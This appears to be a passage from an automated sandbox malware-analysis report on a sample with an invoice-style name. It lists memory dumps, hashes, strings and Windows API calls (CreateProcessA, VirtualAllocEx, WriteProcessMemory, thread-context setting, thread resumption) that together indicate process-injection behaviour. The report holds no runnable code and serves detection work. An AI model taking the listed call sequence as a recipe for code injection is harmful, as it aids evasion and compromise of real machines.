                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 067C1D11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 50a42205f74bb2ef9edd8b2ab6ce219c4445ad1847fcb46abfbeba6ee1064b5e
                                                          • Instruction ID: d671ae715fd3f8298af633408582a0c85d00eef28b94a486d88b2e6b806a095f
                                                          • Opcode Fuzzy Hash: 50a42205f74bb2ef9edd8b2ab6ce219c4445ad1847fcb46abfbeba6ee1064b5e
                                                          • Instruction Fuzzy Hash: 3A21D4B1D012499FCB10DFAAD984AEEFBF5FF48310F60842AE519A7250C7759940CBA1
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 067C4BA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: fc68bae8f6f49c2315af9df6d8e3efce8c35abbdbd87e26c4e8869359328a907
                                                          • Instruction ID: ff4c8244d6de661688afbcaf485961853af3049296386049ef6a4b710b03baa0
                                                          • Opcode Fuzzy Hash: fc68bae8f6f49c2315af9df6d8e3efce8c35abbdbd87e26c4e8869359328a907
                                                          • Instruction Fuzzy Hash: 641127B1D002088ECB10DFAAC444BAFFBF8EF59320F50842ED519A3240D779A944CFA1
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 067C4BA6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 0cf49b2296fe3be658a130b76255fe6c93782aec8c456b18ea02749546b2e604
                                                          • Instruction ID: 2a7568688e9cb72182433de28c020ad0773872fca247f84fde3b31fcdf34378a
                                                          • Opcode Fuzzy Hash: 0cf49b2296fe3be658a130b76255fe6c93782aec8c456b18ea02749546b2e604
                                                          • Instruction Fuzzy Hash: F611E7B1D002098EDB10DFAAC444AAEFBF4FF59324F54842ED519A7240CB79A945CFA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 37cf08a30079bc70046ff19e0b75e12f0199e38135b69ab3c3308ae922f8db53
                                                          • Instruction ID: 372050a521d484bea75869922bb29f35331b28fedf8540e61e94cd814814c526
                                                          • Opcode Fuzzy Hash: 37cf08a30079bc70046ff19e0b75e12f0199e38135b69ab3c3308ae922f8db53
                                                          • Instruction Fuzzy Hash: 02B1D174E01218CFEB94DFA9D984B9DBBF2BB49305F2090A9D409A7361DB70AD85CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: e60070298e82f8b607ce19bfa493b9c80b302ee8f92f20347f46580d5b57d35c
                                                          • Instruction ID: 6d58542be56bd24df3c87a3e1cf5e9557438b2893e57c951c89aeee02613aa93
                                                          • Opcode Fuzzy Hash: e60070298e82f8b607ce19bfa493b9c80b302ee8f92f20347f46580d5b57d35c
                                                          • Instruction Fuzzy Hash: 77B1E274E01218CFDB94DFA9D984B9DBBF2BB49304F2090A9D409A7361DB70AE85CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: 520914dfc043b365e719ac8d5cace8622a54a103747f39f546b4691ca89d9fdb
                                                          • Instruction ID: 9a02a1aa488e6f790727d474e870686707f12bad5dea982a31a8396bf5348663
                                                          • Opcode Fuzzy Hash: 520914dfc043b365e719ac8d5cace8622a54a103747f39f546b4691ca89d9fdb
                                                          • Instruction Fuzzy Hash: E5A15870E04208CFDB95DFA8D884BADB7F2FB49304F50906AE419AB396DB349985CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: 3088e995fb71fbe2e11111b8dae19204ca7524e4b876b92c39bbf5751a6e5efa
                                                          • Instruction ID: d51fa19a2139f1868e671ee697fb063337dd2fc2238d2678494a241182cc4830
                                                          • Opcode Fuzzy Hash: 3088e995fb71fbe2e11111b8dae19204ca7524e4b876b92c39bbf5751a6e5efa
                                                          • Instruction Fuzzy Hash: 8FA16870E04208CFDB85DFA8D884BADB7F2FB49304F50906AE419AB396DB349985CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: 9913b286d37120342b302c5a8304cab007324d7e0a1d8186461cce0b43971e19
                                                          • Instruction ID: fe0ad62abd2c67c88eed43d41e02647170d8efe9af3ed7d28b9ef12b472bc917
                                                          • Opcode Fuzzy Hash: 9913b286d37120342b302c5a8304cab007324d7e0a1d8186461cce0b43971e19
                                                          • Instruction Fuzzy Hash: 1D913870E05208CFEB95EFA8D484BADB7F2FB49304F50906AE419AB356DB349985CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2165010965.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: J
                                                          • API String ID: 0-1141589763
                                                          • Opcode ID: 6f6ada0411893cdc58bcac29213c3155404c44783196f8bb28dbf1740ac4fb8f
                                                          • Instruction ID: 6ffaa3bdeb65ad0a9af48fce9bd125caec6974557da3c4f5c646ef9d9c82b661
                                                          • Opcode Fuzzy Hash: 6f6ada0411893cdc58bcac29213c3155404c44783196f8bb28dbf1740ac4fb8f
                                                          • Instruction Fuzzy Hash: 283188B1D156288BEB5ACF6BDC4069DFAFBBFC8204F04D1AA950CA6254DB700B818F54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2170523553.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6a90000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PZT
                                                          • API String ID: 0-3004033766
                                                          • Opcode ID: 022f2ce95b19975d43d728507c973b681cb2b955b7dd35be1e7101cb5f80f117
                                                          • Instruction ID: d4b8ec69d20981d0024898e93de5f5dc1f642035671aa8b3a38b7ae884302cc8
                                                          • Opcode Fuzzy Hash: 022f2ce95b19975d43d728507c973b681cb2b955b7dd35be1e7101cb5f80f117
                                                          • Instruction Fuzzy Hash: DF310774A01218CFEB94EF69D855BA9B7F6FB48300F0090AAE50AA7355DB349A84CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2148641823.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1060000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ad125a8d0f6191de43af669432cb04ecb4f3a6f5de0843ed06c794aab3ab4d6
                                                          • Instruction ID: 47daf78e99b095f3184d1d086477bf5050e8281f1686976b9f88a75d646db7e4
                                                          • Opcode Fuzzy Hash: 2ad125a8d0f6191de43af669432cb04ecb4f3a6f5de0843ed06c794aab3ab4d6
                                                          • Instruction Fuzzy Hash: 4751A070E4522CCFFB64DF29C984B99B7B5BB49300F1086EAD449A3251DB309AC5CF55
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2148641823.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1060000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3858249bc93f37f0c5793f2b2a66d9d2ec74d2434a35699ef917bbc78b88f29d
                                                          • Instruction ID: ebed305bc0b236a99aa614f878ae98ea47a48da75b06686d0b2488d771d41b25
                                                          • Opcode Fuzzy Hash: 3858249bc93f37f0c5793f2b2a66d9d2ec74d2434a35699ef917bbc78b88f29d
                                                          • Instruction Fuzzy Hash: 1A51AF70E4522CCFEB68DF29C984B99B7B5BB89300F10C6EAD449A3251DB309AC5CF55

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Haq$Haq$Haq
                                                          • API String ID: 0-3013282719
                                                          • Opcode ID: f62b6b6921364f0900494a6583f83f728bf794e70d9594e396fd0103be6d449c
                                                          • Instruction ID: 89bbb06bdaacb3d7419574ed53b4555405d6e0feb46e57382766ef866c83df9d
                                                          • Opcode Fuzzy Hash: f62b6b6921364f0900494a6583f83f728bf794e70d9594e396fd0103be6d449c
                                                          • Instruction Fuzzy Hash: E7126F31A002058FDB68DFA9D884AAEBBF6FF84300F14856DE5069B795DB31EC45CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164312165.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 81e4d8fd3950e66e93646274b677949ec3d653a0295da97475d3093b5fdf1ef6
                                                          • Instruction ID: d7f2da2ec712cb4097d10b9cc60364934cce00911bf086f6a468f0e2026f20de
                                                          • Opcode Fuzzy Hash: 81e4d8fd3950e66e93646274b677949ec3d653a0295da97475d3093b5fdf1ef6
                                                          • Instruction Fuzzy Hash: 82E290709093899FCB66CBE4CC58BAE7FB5FF46310F14409AE540AB2A2C6745945CFB2

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q$4']q
                                                          • API String ID: 0-705557208
                                                          • Opcode ID: b8972b3b5fd455bc1ffefe69bdfa005efd837c78513f5f6428414259449e30ab
                                                          • Instruction ID: 730cc7a723ad0276c93a6f8b767ca0b65a15a769af38169db9bf1c2c6ced8090
                                                          • Opcode Fuzzy Hash: b8972b3b5fd455bc1ffefe69bdfa005efd837c78513f5f6428414259449e30ab
                                                          • Instruction Fuzzy Hash: 3FF1DD34A10218DFDB48DF64D994E9EBBB2FF89300F118168E516AB3A5DB71EC46CB50

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 067C28C2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: U
                                                          • API String ID: 963392458-3372436214
                                                          • Opcode ID: 220d018aa478f12cf95342b7560c94db8c1c61c337ca4dc6bde9a526f9f154b2
                                                          • Instruction ID: 5860da243147b11b9f1bb45d2ecd90e49d9857bd00276017a6b4167855140d2c
                                                          • Opcode Fuzzy Hash: 220d018aa478f12cf95342b7560c94db8c1c61c337ca4dc6bde9a526f9f154b2
                                                          • Instruction Fuzzy Hash: 61815570D006499FDB50CFA9C8817EEBBF1BF48324F24852DE869A7255D7749982CB81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164312165.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: fa6665903434b0db4116e02c601dc92dc02b323c3084b6cb028ba2d8c0453bb7
                                                          • Instruction ID: d62086f0aa345cc6099625d73b0d97a5a98ea713f3b0f9e43a641456bf678c94
                                                          • Opcode Fuzzy Hash: fa6665903434b0db4116e02c601dc92dc02b323c3084b6cb028ba2d8c0453bb7
                                                          • Instruction Fuzzy Hash: 5DF1C074D01209EFCB98DFE8E5886ADBBB2FF49325F20442DE50AA7254DB305A85DF41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2148641823.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1060000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q$`Q]q
                                                          • API String ID: 0-2790359648
                                                          • Opcode ID: 914f211d0bf7be359bb34c39945e8cd6e3d2fa9253aa7bcb95483140cbee4477
                                                          • Instruction ID: 630423ae3693773b0e4e9cc02114cd1d9eccd2abc1fbab144987eed10b8a298e
                                                          • Opcode Fuzzy Hash: 914f211d0bf7be359bb34c39945e8cd6e3d2fa9253aa7bcb95483140cbee4477
                                                          • Instruction Fuzzy Hash: 6EB1E2B4D45229CFDB60CF28DD48BADB7B5BB49351F0080EAD689A7290DB741AC4CF19
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164312165.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: a88c1ea1b4b89fe92f9fbdb17ca2661b72db3a0194dbd2dd4e68969275134d1f
                                                          • Instruction ID: 227b274f59b59363718ff1644189e2ce2a435aee5d204bcaab810fd08ab254cd
                                                          • Opcode Fuzzy Hash: a88c1ea1b4b89fe92f9fbdb17ca2661b72db3a0194dbd2dd4e68969275134d1f
                                                          • Instruction Fuzzy Hash: 3591DC34E00208DFCB98DFE9D998AECBBB2BF89325F109529D526B7250CB355845CF61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$(aq
                                                          • API String ID: 0-3916115647
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$Haq
                                                          • API String ID: 0-3785302501
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$`A
                                                          • API String ID: 0-322524450
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2170523553.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6a90000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$0M
                                                          • API String ID: 0-3844039254
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164312165.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq
                                                          • API String ID: 0-3092978723
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (_]q
                                                          • API String ID: 0-188044275
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 067C28C2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $]q
                                                          • API String ID: 0-1007455737
                                                          APIs
                                                          • CopyFileA.KERNEL32(?,?,?), ref: 05AF7705
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2162304348.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5af0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          APIs
                                                          • CopyFileA.KERNEL32(?,?,?), ref: 05AF7705
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2162304348.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5af0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 067C3868
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 067C3868
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 067C3F66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 067DD7FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 067C3F66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 065A037C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 067DD7FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 065A037C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 067C455E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 067C455E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 065A135B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 534b8a2065272f857cbb26277060ff5ba44a9b5facb6b077214ba91f89a5e8b2
                                                          • Instruction ID: 60ff1b69eeb306644a47ed7ceee29bb9a8b1a95b543eaec4209e759c0b04b670
                                                          • Opcode Fuzzy Hash: 534b8a2065272f857cbb26277060ff5ba44a9b5facb6b077214ba91f89a5e8b2
                                                          • Instruction Fuzzy Hash: AD1147718006089FCB20DFAAC844AEEBFF5EF89314F14841AE569A7250CB759544CBA0
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 065A135B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: cacb1fa02eb3b85530f97c9a837ff0647a9783c666cfc93b3b09d0a31dddb283
                                                          • Instruction ID: c42985fc94ac4f6d71f0eac88367c559caca49640ce5ff8faf755cdf5ef4acb5
                                                          • Opcode Fuzzy Hash: cacb1fa02eb3b85530f97c9a837ff0647a9783c666cfc93b3b09d0a31dddb283
                                                          • Instruction Fuzzy Hash: 441137759002088FCB20DFAAC844AEEFBF5FF48320F14841AD559A7250C779A540CFA0
                                                          Strings
                                                          Memory Dump Source
